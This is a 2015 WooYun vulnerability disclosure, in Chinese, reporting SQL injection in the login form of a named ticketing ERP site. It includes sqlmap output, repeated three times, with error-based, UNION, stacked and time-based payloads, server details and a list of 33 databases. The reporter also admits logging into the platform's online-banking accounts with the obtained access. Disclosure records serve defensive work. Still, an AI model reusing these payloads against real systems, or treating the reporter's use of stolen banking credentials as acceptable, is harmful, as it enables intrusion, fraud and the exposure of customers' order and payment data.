当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100495

漏洞标题:第三方某售票系统sql注入(泄露机票火车票用户手机订单信息,平台各个网银账号密码支付宝,还可群发短信等)

相关厂商:cncert国家互联网应急中心

漏洞作者: YY-2012

提交时间:2015-03-10 14:57

修复时间:2015-04-24 14:58

公开时间:2015-04-24 14:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-10: 细节已通知厂商并且等待厂商处理中
2015-03-15: 厂商已经确认,细节仅向厂商公开
2015-03-18: 细节向第三方安全合作伙伴开放
2015-05-09: 细节向核心白帽子及相关领域专家公开
2015-05-19: 细节向普通白帽子公开
2015-05-29: 细节向实习白帽子公开
2015-04-24: 细节向公众公开

简要描述:

我就登录了下你们的网银什么都没做,你们不信也没办法le。。

详细说明:

票友ERP管理系统
http://jy.4000211929.com/
登录框存在post注入,利用万能密码登录了。。
发现各个网银都能登录的。。

漏洞证明:

qqqqq1111111111111.jpg


qqqqqq222222222.jpg


qqqqqqqqqq3333333333.jpg


qqqqqqqq5555555.jpg


qqqqqqqqqqqq4444444444.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: u (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: u=admin' AND 9063=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9063=9063) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113))) AND 'elof'='elof&p=admin&y=0489
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: u=-9011' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(102)+CHAR(98)+CHAR(117)+CHAR(107)+CHAR(100)+CHAR(85)+CHAR(71)+CHAR(72)+CHAR(77)+CHAR(121)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL-- &p=admin&y=0489
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: u=admin'; WAITFOR DELAY '0:0:5'--&p=admin&y=0489
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: u=admin' WAITFOR DELAY '0:0:5'--&p=admin&y=0489
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: u (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: u=admin' AND 9063=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9063=9063) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113))) AND 'elof'='elof&p=admin&y=0489
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: u=-9011' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(102)+CHAR(98)+CHAR(117)+CHAR(107)+CHAR(100)+CHAR(85)+CHAR(71)+CHAR(72)+CHAR(77)+CHAR(121)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL-- &p=admin&y=0489
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: u=admin'; WAITFOR DELAY '0:0:5'--&p=admin&y=0489
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: u=admin' WAITFOR DELAY '0:0:5'--&p=admin&y=0489
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: u (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: u=admin' AND 9063=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9063=9063) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113))) AND 'elof'='elof&p=admin&y=0489
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: u=-9011' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(102)+CHAR(98)+CHAR(117)+CHAR(107)+CHAR(100)+CHAR(85)+CHAR(71)+CHAR(72)+CHAR(77)+CHAR(121)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL-- &p=admin&y=0489
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: u=admin'; WAITFOR DELAY '0:0:5'--&p=admin&y=0489
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: u=admin' WAITFOR DELAY '0:0:5'--&p=admin&y=0489
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [33]:
[*] 85233898
[*] aiyang_pvg
[*] aiyang_web
[*] byclq_sha
[*] cht_travel
[*] cht_web
[*] czair_szx
[*] hangyue_sha
[*] jieyou_sha
[*] jtkj_pek
[*] kuaiqu_sha
[*] lingxian_xiy
[*] lvtui_dlc
[*] master
[*] model
[*] msdb
[*] oa_users
[*] pek_hsdair
[*] PiaoYou_lesirui
[*] PiaoYou_shanixin
[*] qiancheng_sha
[*] qqhorse_sha
[*] regcompany
[*] saibo_kmg
[*] shuoxing_szx
[*] silu_bjs
[*] tempdb
[*] tscy_szx
[*] wanghai_hak
[*] wine_sha_lv
[*] xincheng
[*] yps_can
[*] zgppt


qqqqqqqqqqq66666666.jpg

修复方案:

你们懂的。。

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-03-15 11:17

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-10 15:48 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    网银都泄漏了

  2. 2015-04-24 15:54 | 圣路西法 ( 路人 | Rank:4 漏洞数:3 | 围观大神ส็็็็็็ ̷̸̨̀͒̏̃ͦ...)

    我就登录了下你们的网银什么都没做,你们不信也没办法le。。

  3. 2015-04-26 02:40 | black hook ( 路人 | Rank:28 漏洞数:8 | 新人、)

    @疯狗 好像密码还都没改。。打个码呗